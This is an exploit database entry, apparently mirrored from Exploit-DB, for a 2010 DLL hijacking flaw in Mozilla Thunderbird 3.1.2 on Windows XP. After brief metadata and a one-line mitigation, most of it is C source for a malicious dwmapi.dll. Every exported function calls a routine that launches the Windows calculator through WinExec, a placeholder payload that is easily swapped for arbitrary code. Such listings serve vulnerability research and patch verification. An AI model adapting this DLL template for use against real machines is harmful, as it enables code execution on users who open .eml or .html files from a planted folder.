Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

vendor:

Thunderbird

by:

h4ck3r#47

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Thunderbird

Affected Version From: 3.1.2

Affected Version To: 3.1.2

Patch Exists: YES

Related CWE: N/A

CPE: Mozilla Thunderbird

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

This exploit is based on the exploit from 'TheLeader' and affects the latest version of Mozilla Thunderbird 3.1.2. It is a DLL hijacking exploit that targets vulnerable extensions such as .eml and .html. The code includes a malicious function 'evil()' which executes the Windows calculator when called.

Mitigation:

Ensure that all applications are up to date and that all vulnerable extensions are disabled.

Source

Exploit-DB raw data:

/* 
Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )
Date: 26/08/2010
Author: h4ck3r#47 
http://twitter.com/hxteam
Version: Latest Mozilla Thunderbird 3.1.2 
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .eml .html
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}